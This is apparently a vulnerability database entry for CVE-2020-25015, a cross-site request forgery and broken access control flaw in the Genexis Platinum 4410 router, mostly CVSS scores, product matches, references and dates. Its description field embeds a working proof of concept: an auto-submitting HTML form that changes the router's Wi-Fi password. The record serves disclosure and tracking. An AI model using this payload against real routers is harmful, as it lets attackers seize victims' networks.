VAR-202009-0727
Vulnerability from variot - Updated: 2024-02-13 23:03A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
Date: 28-08-2020
Vendor Homepage: https://www.gxgroup.eu/ont-products/
Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
Version: v2.1 (software version P4410-V2-1.28)
CVE : CVE-2020-25015
-
Proof of Concept
Create an HTML file with the following code:
history.pushState('', '', '/') document.forms[0].submit();Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
-
PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
-
Timeline
Vulnerability reported to the Genexis team – August 28, 2020 Team confirmed firmware release containing fix – September 14, 2020
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202009-0727",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2-1.28"
},
{
"model": "platinum",
"scope": "eq",
"trust": 0.6,
"vendor": "genexis",
"version": "4410v2-1.28"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.28:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:genexis:platinum_4410:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jinson Varghese Behanan",
"sources": [
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.7
},
"cve": "CVE-2020-25015",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-25015",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-56086",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-25015",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-25015",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF\n# Date: 28-08-2020\n# Vendor Homepage: https://www.gxgroup.eu/ont-products/\n# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)\n# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/\n# Version: v2.1 (software version P4410-V2-1.28)\n# CVE : CVE-2020-25015\n\n1. \n\n2. \n\n3. Proof of Concept\n\nCreate an HTML file with the following code:\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/cgi-bin/net-wlan.asp\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"wlEnbl\" value=\"ON\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys1\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys2\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys3\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlgMode\" value=\"9\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlAuthMode\" value=\"WPAPSKWPA2PSK\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlEnbl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWPSMode\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"henableSsid\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlHide\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isInWPSing\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeAll\" value=\"7\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeNone\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWpsStart\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isCUCSupport\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSIDPre\" value=\"N\u0026#47;A\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControlhidden\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"ht\u0026#95;bw\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlgMode\" value=\"b\u0026#44;g\u0026#44;n\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlChannel\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlTxPwr\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsidIdx\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSID\u0026#95;Flag\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsid\" value=\"JINSON\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlMcs\" value=\"33\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"giControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"enableSsid\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlAssociateNum\" value=\"32\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSecurMode\" value=\"WPAand11i\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlPreauth\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlNetReauth\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaPsk\" value=\"NEWPASSWORD\" /\u003e\n \u003cinput type=\"hidden\" name=\"cb\u0026#95;enablshowpsw\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaGtkRekey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusIPAddr\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusPort\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusKey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpa\" value=\"TKIPAES\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeyBit\" value=\"64\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsActive\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wpsmode\" value=\"ap\u0026#45;pbc\" /\u003e\n \u003cinput type=\"hidden\" name=\"pinvalue\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"Save\u0026#95;Flag\" value=\"1\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003cscript\u003e\n document.forms[0].submit();\n \u003c/script\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\nOpen this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD\n\n\n4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk\u0026feature=emb_title\n\n3. Timeline\n\nVulnerability reported to the Genexis team \u2013 August 28, 2020\nTeam confirmed firmware release containing fix \u2013 September 14, 2020\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "PACKETSTORM",
"id": "159936"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25015",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "159936",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "49000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"id": "VAR-202009-0727",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
],
"trust": 1.3232142850000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
]
},
"last_update_date": "2024-02-13T23:03:44.191000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
},
{
"title": "Patch for Genexis Platinum cross-site request forgery vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/236092"
},
{
"title": "Genexis Platinum Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=128996"
},
{
"title": "https://github.com/jinsonvarghese/jinsonvarghese",
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/159936/genexis-platinum-4410-p4410-v2-1.28-missing-access-control-csrf.html"
},
{
"trust": 2.6,
"url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25015"
},
{
"trust": 1.7,
"url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/49000"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese"
},
{
"trust": 0.1,
"url": "https://www.gxgroup.eu/ont-products/"
},
{
"trust": 0.1,
"url": "https://www.youtube.com/watch?v=nsu5andh2rk\u0026feature=emb_title"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/net-wlan.asp\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2020-09-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-09T17:26:50",
"db": "PACKETSTORM",
"id": "159936"
},
{
"date": "2020-09-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2020-09-16T18:15:13.390000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2022-11-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T06:57:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2022-11-16T14:14:45.577000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum cross-site request forgery vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…